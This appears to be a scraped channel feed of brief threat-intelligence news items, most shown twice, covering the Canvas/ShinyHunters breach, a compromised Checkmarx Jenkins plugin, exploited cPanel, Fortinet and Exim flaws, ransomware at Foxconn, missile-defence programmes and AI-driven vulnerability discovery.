๐ค AI-Generated Zero-Day Exploited in Targeted Campaign
Google's Threat Intelligence Group has identified criminal actors deploying an AI-generated zero-day vulnerability in a coordinated mass exploitation attempt. The incident marks a significant escalation beyond traditional AI-assisted social engineering, according to Google's analysis, demonstrating adversary capability to weaponize machine learning for vulnerability discovery and exploit development.
The development signals a tactical shift in threat actor tradecraft, compressing the exploit development cycle and potentially lowering technical barriers for sophisticated attacks. GTIG assessment indicates this represents operational maturation beyond phishing and chatbot manipulation into autonomous offensive capabilities.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Google's Threat Intelligence Group has identified criminal actors deploying an AI-generated zero-day vulnerability in a coordinated mass exploitation attempt. The incident marks a significant escalation beyond traditional AI-assisted social engineering, according to Google's analysis, demonstrating adversary capability to weaponize machine learning for vulnerability discovery and exploit development.
The development signals a tactical shift in threat actor tradecraft, compressing the exploit development cycle and potentially lowering technical barriers for sophisticated attacks. GTIG assessment indicates this represents operational maturation beyond phishing and chatbot manipulation into autonomous offensive capabilities.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ ShinyHunters Resets Leak Deadline Following Double Canvas Breach Confirmation
Nearly 9,000 schools face data exposure after intrusion into Double Canvas systems was confirmed. The threat actor ShinyHunters has reset the deadline for releasing compromised data, according to reporting by The Register, escalating pressure on the education technology platform.
The breach demonstrates persistent targeting of educational infrastructure, with ShinyHunters leveraging deadline extensions as a negotiation tactic. Affected institutions remain in a critical window for incident response and stakeholder notification as the threat actor maintains control of the timeline.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Nearly 9,000 schools face data exposure after intrusion into Double Canvas systems was confirmed. The threat actor ShinyHunters has reset the deadline for releasing compromised data, according to reporting by The Register, escalating pressure on the education technology platform.
The breach demonstrates persistent targeting of educational infrastructure, with ShinyHunters leveraging deadline extensions as a negotiation tactic. Affected institutions remain in a critical window for incident response and stakeholder notification as the threat actor maintains control of the timeline.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ซ Instructure Confirms XSS Flaws Enabled Canvas Portal Defacement
Education technology provider Instructure disclosed that threat actor ShinyHunters exploited cross-site scripting vulnerabilities in Canvas LMS to inject malicious JavaScript and gain authenticated admin access. The May 7 defacement operation followed an initial April 29 breach in which ShinyHunters claims to have exfiltrated 3.6TB of data from 8,809 educational institutions affecting approximately 275 million records.
The attackers weaponized user-generated content features to hijack admin sessions and inject extortion messages onto login portals, demanding ransom negotiations by May 12. Instructure temporarily disabled Free-for-Teacher accounts and restored Canvas services on May 9 after applying additional safeguards.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Education technology provider Instructure disclosed that threat actor ShinyHunters exploited cross-site scripting vulnerabilities in Canvas LMS to inject malicious JavaScript and gain authenticated admin access. The May 7 defacement operation followed an initial April 29 breach in which ShinyHunters claims to have exfiltrated 3.6TB of data from 8,809 educational institutions affecting approximately 275 million records.
The attackers weaponized user-generated content features to hijack admin sessions and inject extortion messages onto login portals, demanding ransom negotiations by May 12. Instructure temporarily disabled Free-for-Teacher accounts and restored Canvas services on May 9 after applying additional safeguards.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ซ Checkmarx Jenkins Plugin Compromised in Supply Chain Attack
Checkmarx warned that a malicious version of its Jenkins Application Security Testing plugin was published to the official Jenkins Marketplace by TeamPCP threat actors. The rogue version (2026.5.09) was uploaded May 9 using credentials stolen during the March Trivy vulnerability scanner breach, delivering credential-stealing malware to CI/CD pipelines.
The compromise marks the third incident in TeamPCP's campaign against Checkmarx since late March. Organizations using the Jenkins AST plugin should verify they're running version 2.0.13-829.vc72453fa_1c16 from December 2025, rotate all secrets, and investigate for lateral movement if the malicious version was deployed.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Checkmarx warned that a malicious version of its Jenkins Application Security Testing plugin was published to the official Jenkins Marketplace by TeamPCP threat actors. The rogue version (2026.5.09) was uploaded May 9 using credentials stolen during the March Trivy vulnerability scanner breach, delivering credential-stealing malware to CI/CD pipelines.
The compromise marks the third incident in TeamPCP's campaign against Checkmarx since late March. Organizations using the Jenkins AST plugin should verify they're running version 2.0.13-829.vc72453fa_1c16 from December 2025, rotate all secrets, and investigate for lateral movement if the malicious version was deployed.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ซ cPanel CVE-2026-41940 Exploited for Filemanager Backdoor
Active exploitation of CVE-2026-41940 targeting cPanel installations has been confirmed, with threat actors deploying backdoors through the platform's filemanager component. According to reporting, attackers are leveraging the vulnerability to establish persistent access on compromised web hosting infrastructure.
The exploitation pattern indicates focus on hosting providers and shared environments where cPanel remains widely deployed. Organizations running affected versions face immediate risk of unauthorized administrative access and lateral movement across hosted domains.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Active exploitation of CVE-2026-41940 targeting cPanel installations has been confirmed, with threat actors deploying backdoors through the platform's filemanager component. According to reporting, attackers are leveraging the vulnerability to establish persistent access on compromised web hosting infrastructure.
The exploitation pattern indicates focus on hosting providers and shared environments where cPanel remains widely deployed. Organizations running affected versions face immediate risk of unauthorized administrative access and lateral movement across hosted domains.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ซ U.S. Plans Hypersonic Interceptor Demo by 2027
The Missile Defense Agency will conduct a flight test of Project Maverick along the U.S. east coast in fiscal 2027, aiming to demonstrate tracking and defeat capabilities against hypersonic missiles. The test will integrate multi-phenomenology sensor data with tactical battle management systems to direct an interceptor toward a hypersonic target, according to MDA budget documents.
The demonstration represents an interim solution while the agency's Glide Phase Interceptor program progresses toward 2031 deployment. MDA Director Lt. Gen. Heath Collins emphasized that current terminal defenses only engage threats in the endgame phase, whereas future systems will provide layered intercept opportunities against maneuvering hypersonic weapons traveling at Mach 5 or faster.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
The Missile Defense Agency will conduct a flight test of Project Maverick along the U.S. east coast in fiscal 2027, aiming to demonstrate tracking and defeat capabilities against hypersonic missiles. The test will integrate multi-phenomenology sensor data with tactical battle management systems to direct an interceptor toward a hypersonic target, according to MDA budget documents.
The demonstration represents an interim solution while the agency's Glide Phase Interceptor program progresses toward 2031 deployment. MDA Director Lt. Gen. Heath Collins emphasized that current terminal defenses only engage threats in the endgame phase, whereas future systems will provide layered intercept opportunities against maneuvering hypersonic weapons traveling at Mach 5 or faster.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ Pentagon's Strategic Capabilities Office details $1.7B operational priorities
SCO Director Jay Dryer outlined the classified office's three core portfolios at the AI+ Expo: long-range fires, autonomy and AI, and special enabling capabilities spanning cyber, electronic warfare, space and special operations. Eight focus areas include precision fires, contested logistics, collaborative systems, deception, advanced kill webs, countering adversary kill chains, extended reach survivability, and cost-effective air defense.
According to Dryer's briefing, project selection derives from combatant command requirements rather than internal preference, with built-in flexibility to adapt to testing outcomes and adversary evolution.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
SCO Director Jay Dryer outlined the classified office's three core portfolios at the AI+ Expo: long-range fires, autonomy and AI, and special enabling capabilities spanning cyber, electronic warfare, space and special operations. Eight focus areas include precision fires, contested logistics, collaborative systems, deception, advanced kill webs, countering adversary kill chains, extended reach survivability, and cost-effective air defense.
According to Dryer's briefing, project selection derives from combatant command requirements rather than internal preference, with built-in flexibility to adapt to testing outcomes and adversary evolution.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ US Congress Demands Instructure Testimony on Canvas Breach
The House Committee on Homeland Security has summoned Instructure CEO Steve Daly to testify on two cyberattacks by ShinyHunters that compromised Canvas learning management systems, exposing data from 280 million records across 8,809 educational institutions. The breach, detected April 29, exposed student names, email addresses, and internal messages, while a second attack defaced login portals using XSS vulnerabilities during final exams.
The committee's May 12 letter questions Instructure's incident response after the company reached an undisclosed "agreement" with ShinyHunters to halt data leaksโa move that typically indicates ransom payment. Schools across 11 states reported disruptions, with briefing requested by May 21.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
The House Committee on Homeland Security has summoned Instructure CEO Steve Daly to testify on two cyberattacks by ShinyHunters that compromised Canvas learning management systems, exposing data from 280 million records across 8,809 educational institutions. The breach, detected April 29, exposed student names, email addresses, and internal messages, while a second attack defaced login portals using XSS vulnerabilities during final exams.
The committee's May 12 letter questions Instructure's incident response after the company reached an undisclosed "agreement" with ShinyHunters to halt data leaksโa move that typically indicates ransom payment. Schools across 11 states reported disruptions, with briefing requested by May 21.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ Foxconn Confirms Breach After Nitrogen Ransomware Claims Apple, Nvidia Data Theft
Foxconn has acknowledged a cyberattack on its manufacturing facilities following claims by the Nitrogen ransomware group of exfiltrating sensitive data allegedly belonging to Apple and Nvidia. The company states affected factories have resumed operations, though according to reporting, the scope of compromised information remains unconfirmed.
The incident highlights supply chain vulnerabilities in electronics manufacturing, where a single contractor breach can potentially expose multiple tier-one technology clients. Nitrogen's targeting of high-value manufacturing infrastructure suggests continued adversary focus on indirect access to proprietary design and production data.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Foxconn has acknowledged a cyberattack on its manufacturing facilities following claims by the Nitrogen ransomware group of exfiltrating sensitive data allegedly belonging to Apple and Nvidia. The company states affected factories have resumed operations, though according to reporting, the scope of compromised information remains unconfirmed.
The incident highlights supply chain vulnerabilities in electronics manufacturing, where a single contractor breach can potentially expose multiple tier-one technology clients. Nitrogen's targeting of high-value manufacturing infrastructure suggests continued adversary focus on indirect access to proprietary design and production data.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ UK Regulator Fines Water Company ยฃ963,900 Over Multi-Year Breach
The Information Commissioner's Office penalized South Staffordshire Water Plc after a cyberattack beginning September 2020 exposed personal data of 663,887 customers and employees. The breach went undetected for 20 months following a phishing attack that installed malware, with domain administrator access achieved by mid-2022. Leaked data included names, addresses, bank details, and National Insurance numbers.
The investigation revealed critical security failures including monitoring covering only 5% of IT infrastructure, use of Windows Server 2003, and poor vulnerability management. The fine was reduced 40% due to early liability admission and regulatory cooperation.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
The Information Commissioner's Office penalized South Staffordshire Water Plc after a cyberattack beginning September 2020 exposed personal data of 663,887 customers and employees. The breach went undetected for 20 months following a phishing attack that installed malware, with domain administrator access achieved by mid-2022. Leaked data included names, addresses, bank details, and National Insurance numbers.
The investigation revealed critical security failures including monitoring covering only 5% of IT infrastructure, use of Windows Server 2003, and poor vulnerability management. The fine was reduced 40% due to early liability admission and regulatory cooperation.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ค OpenAI Grants European Firms Access to GPT-5.5-Cyber Model
U.S. AI developer OpenAI has provided Deutsche Telekom, BBVA, and dozens of European companies access to its latest models, including GPT-5.5-Cyber, specifically according to Reuters reporting. The initiative aims to strengthen corporate defenses against system vulnerabilities through advanced AI capabilities.
The deployment signals OpenAI's strategic pivot toward embedding specialized security-focused models within critical European infrastructure sectors. Access to GPT-5.5-Cyber suggests the model includes enhanced threat detection and resilience features tailored for enterprise cybersecurity operations.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
U.S. AI developer OpenAI has provided Deutsche Telekom, BBVA, and dozens of European companies access to its latest models, including GPT-5.5-Cyber, specifically according to Reuters reporting. The initiative aims to strengthen corporate defenses against system vulnerabilities through advanced AI capabilities.
The deployment signals OpenAI's strategic pivot toward embedding specialized security-focused models within critical European infrastructure sectors. Access to GPT-5.5-Cyber suggests the model includes enhanced threat detection and resilience features tailored for enterprise cybersecurity operations.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ก FCC Extends Authorization Window for Chinese IoT Equipment Updates
The U.S. Federal Communications Commission announced Tuesday it will permit Chinese-manufactured drones and consumer routers already sold domestically to receive critical software updates through at least December 2028, according to Reuters reporting. The authorization applies to devices currently deployed despite broader security restrictions on Chinese communications equipment.
The decision balances operational security with practical necessityโabruptly terminating updates would create vulnerabilities exceeding risks from controlled channels. Timeline suggests a regulatory transition period allowing gradual market substitution while maintaining baseline security for deployed assets.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
The U.S. Federal Communications Commission announced Tuesday it will permit Chinese-manufactured drones and consumer routers already sold domestically to receive critical software updates through at least December 2028, according to Reuters reporting. The authorization applies to devices currently deployed despite broader security restrictions on Chinese communications equipment.
The decision balances operational security with practical necessityโabruptly terminating updates would create vulnerabilities exceeding risks from controlled channels. Timeline suggests a regulatory transition period allowing gradual market substitution while maintaining baseline security for deployed assets.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ Signal Deploys Anti-Phishing Protections Against Account Takeover
Signal has rolled out new in-app warnings and friction points to counter social engineering attacks targeting high-profile users. The protections include "Name not verified" labels for new direct message contacts, mandatory acceptance confirmations reminding users never to share registration codes or PINs, and enriched safety tips. The move follows multiple incidents attributed to Russian state actors exploiting the Linked Device feature via fraudulent QR codes.
The updates address a documented attack vector where threat actors impersonate Signal Support to hijack accounts and access chat histories. Users should audit linked devices in settings and remove unrecognized entries.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Signal has rolled out new in-app warnings and friction points to counter social engineering attacks targeting high-profile users. The protections include "Name not verified" labels for new direct message contacts, mandatory acceptance confirmations reminding users never to share registration codes or PINs, and enriched safety tips. The move follows multiple incidents attributed to Russian state actors exploiting the Linked Device feature via fraudulent QR codes.
The updates address a documented attack vector where threat actors impersonate Signal Support to hijack accounts and access chat histories. Users should audit linked devices in settings and remove unrecognized entries.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ซ cPanel CVE-2026-41940 Exploited for Filemanager Backdoor Deployment
Threat actors are actively exploiting authentication bypass vulnerability CVE-2026-41940 (CVSS 9.3) in cPanel and WHM versions after 11.40 to deploy a Go-based backdoor called Filemanager. The campaign, as reported by Security Affairs, has been linked to Mr_Rot13 threat group, with over 2,000 malicious IPs targeting the flaw since its April 28 disclosure. Southeast Asian government and military institutions have been affected.
The Filemanager malware installs SSH keys, deploys PHP webshells, injects malicious JavaScript into login pages, and exfiltrates credentials via Telegram. QiAnXin XLab traces Mr_Rot13 activity back to 2020, with consistently low detection rates across security products.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Threat actors are actively exploiting authentication bypass vulnerability CVE-2026-41940 (CVSS 9.3) in cPanel and WHM versions after 11.40 to deploy a Go-based backdoor called Filemanager. The campaign, as reported by Security Affairs, has been linked to Mr_Rot13 threat group, with over 2,000 malicious IPs targeting the flaw since its April 28 disclosure. Southeast Asian government and military institutions have been affected.
The Filemanager malware installs SSH keys, deploys PHP webshells, injects malicious JavaScript into login pages, and exfiltrates credentials via Telegram. QiAnXin XLab traces Mr_Rot13 activity back to 2020, with consistently low detection rates across security products.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ซ Fortinet patches critical RCE flaws in FortiSandbox and FortiAuthenticator
Fortinet released security updates addressing two critical vulnerabilities enabling unauthenticated remote code execution. CVE-2026-44277 affects FortiAuthenticator due to improper access control, while CVE-2026-26083 impacts FortiSandbox through missing authorization checks. Both allow attackers to execute unauthorized commands via crafted HTTP requests, according to Fortinet advisories published Tuesday.
While no active exploitation confirmed, CISA has cataloged 24 actively exploited Fortinet vulnerabilities in recent years, indicating rapid weaponization risk for enterprise IAM and sandboxing infrastructure.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Fortinet released security updates addressing two critical vulnerabilities enabling unauthenticated remote code execution. CVE-2026-44277 affects FortiAuthenticator due to improper access control, while CVE-2026-26083 impacts FortiSandbox through missing authorization checks. Both allow attackers to execute unauthorized commands via crafted HTTP requests, according to Fortinet advisories published Tuesday.
While no active exploitation confirmed, CISA has cataloged 24 actively exploited Fortinet vulnerabilities in recent years, indicating rapid weaponization risk for enterprise IAM and sandboxing infrastructure.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
โก Exim Mail Server Vulnerability Threatens GnuTLS Deployments
A critical vulnerability in the Exim mail transfer agent's BDAT command handling has been identified, specifically affecting builds compiled with GnuTLS support. The flaw potentially enables remote code execution on exposed systems, according to security reporting published May 12.
Exim remains widely deployed across internet-facing mail infrastructure. Organizations running GnuTLS-based builds should prioritize patch deployment, as exploitation could grant attackers direct system access through SMTP protocol interaction without authentication requirements.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
A critical vulnerability in the Exim mail transfer agent's BDAT command handling has been identified, specifically affecting builds compiled with GnuTLS support. The flaw potentially enables remote code execution on exposed systems, according to security reporting published May 12.
Exim remains widely deployed across internet-facing mail infrastructure. Organizations running GnuTLS-based builds should prioritize patch deployment, as exploitation could grant attackers direct system access through SMTP protocol interaction without authentication requirements.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ Vietnam Mandates Sovereign Cloud Infrastructure for Government Operations
Vietnam's government has outlined plans to develop domestic cloud infrastructure to replace foreign providers for state workloads by 2035. The initiative aims to establish data-driven decision-making based on real-time information while reducing dependency on overseas operators deemed security risks.
The move reflects broader regional trends toward digital sovereignty and signals potential market restrictions for Western cloud providers in Southeast Asia. Vietnam joins China and Russia in prioritizing state-controlled data infrastructure, with implications for cross-border data flows and foreign technology access.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Vietnam's government has outlined plans to develop domestic cloud infrastructure to replace foreign providers for state workloads by 2035. The initiative aims to establish data-driven decision-making based on real-time information while reducing dependency on overseas operators deemed security risks.
The move reflects broader regional trends toward digital sovereignty and signals potential market restrictions for Western cloud providers in Southeast Asia. Vietnam joins China and Russia in prioritizing state-controlled data infrastructure, with implications for cross-border data flows and foreign technology access.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
๐ค AI-Driven Vulnerability Discovery Surges Across Major Vendors
Palo Alto Networks disclosed 75 vulnerabilities in May 2026, up from five per month, after scanning with frontier AI models including Anthropic's Mythos. Microsoft's MDASH identified 17 new flaws in the same period, while Mozilla fixed 423 Firefox bugs in Aprilโnearly 20 times its 2025 average. All three participate in Anthropic's Project Glasswing testing program.
The surge strains defenders as triage and patching infrastructure wasn't built for this volume. Palo Alto estimates a three-to-five-month window before adversaries gain equivalent AI capabilities, making proactive scanning critical despite exponentially increased patch cycles.
๐ฐ๏ธ Open sources - closed narratives
@sitreports
Palo Alto Networks disclosed 75 vulnerabilities in May 2026, up from five per month, after scanning with frontier AI models including Anthropic's Mythos. Microsoft's MDASH identified 17 new flaws in the same period, while Mozilla fixed 423 Firefox bugs in Aprilโnearly 20 times its 2025 average. All three participate in Anthropic's Project Glasswing testing program.
The surge strains defenders as triage and patching infrastructure wasn't built for this volume. Palo Alto estimates a three-to-five-month window before adversaries gain equivalent AI capabilities, making proactive scanning critical despite exponentially increased patch cycles.
๐ฐ๏ธ Open sources - closed narratives
@sitreports